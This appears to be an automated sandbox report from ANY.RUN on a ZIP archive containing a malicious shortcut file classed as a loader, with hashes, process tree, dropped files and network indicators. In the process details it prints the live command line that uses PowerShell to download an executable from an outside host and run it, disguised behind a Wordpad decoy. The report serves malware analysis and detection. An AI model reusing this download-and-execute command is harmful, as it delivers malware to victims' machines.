analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

uc

Full analysis: https://app.any.run/tasks/11a4cae1-aa30-45a2-a38a-af1cc4fad640
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 15, 2019, 16:23:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

ECF0F7DA4EB61CEB12B54BA5E41E9AA7

SHA1:

B98F98FACE1D130437FFD02AEFFC0940DBC90FE1

SHA256:

14877AA9F5221E61F68C58C1556FBBB40CD58CAC313F3F93B00EFB808D32AD35

SSDEEP:

3072:8jVXSGZMR6hnUcXpQRAIA0Wbyira1fl3VIAEvtN0uaRCdN5arcHwh8:8jVCGZq6qcZQmIrWbNe11Cd/vaRCd/SA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3824)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2476)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 3336)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3824)
    • Creates files in the user directory

      • powershell.exe (PID: 3824)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 43843_8439_8329052.lnk
ZipUncompressedSize: 140505
ZipCompressedSize: 139110
ZipCRC: 0x28c27490
ZipModifyDate: 2019:05:15 16:46:02
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs cmd.exe no specs powershell.exe wordpad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3336"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\uc.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2476"C:\Windows\System32\cmd.exe" /R set U=http:/&powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"&"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys&C:\Users\admin\AppData\Local\Temp/Up&g3Jerl:+hqw^-BdjJd&cjM34{_________C:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3824powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3380"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sysC:\Program Files\windows nt\accessories\wordpad.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Wordpad Application
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
667
Read events
585
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
3824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S15D7Z25CXGIL7PNGLQ0.temp
MD5:
SHA256:
3824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1235fc.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3336WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3336.45581\43843_8439_8329052.lnklnk
MD5:7091F5FC35DB3730F0482007725E73CC
SHA256:2BA1E0E7470E843B7AAECBF47A3C9329DC53FAFB92D2258625441A24A952A8CD
3824powershell.exeC:\Users\admin\AppData\Local\Temp\Up.exeexecutable
MD5:64DF6FE611B3753E0C6B2069488FACB7
SHA256:826E519579C74530B7A6D1A03C58EA5B01BCA3943D405AA9CBF5CDA2E4DC00FE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3824
powershell.exe
GET
200
69.90.160.255:80
http://myscs.ca/valued_sp3_update.exe
CA
executable
684 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3824
powershell.exe
69.90.160.255:80
myscs.ca
Peer 1 Network (USA) Inc.
CA
suspicious

DNS requests

Domain
IP
Reputation
myscs.ca
  • 69.90.160.255
suspicious

Threats

PID
Process
Class
Message
3824
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3824
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info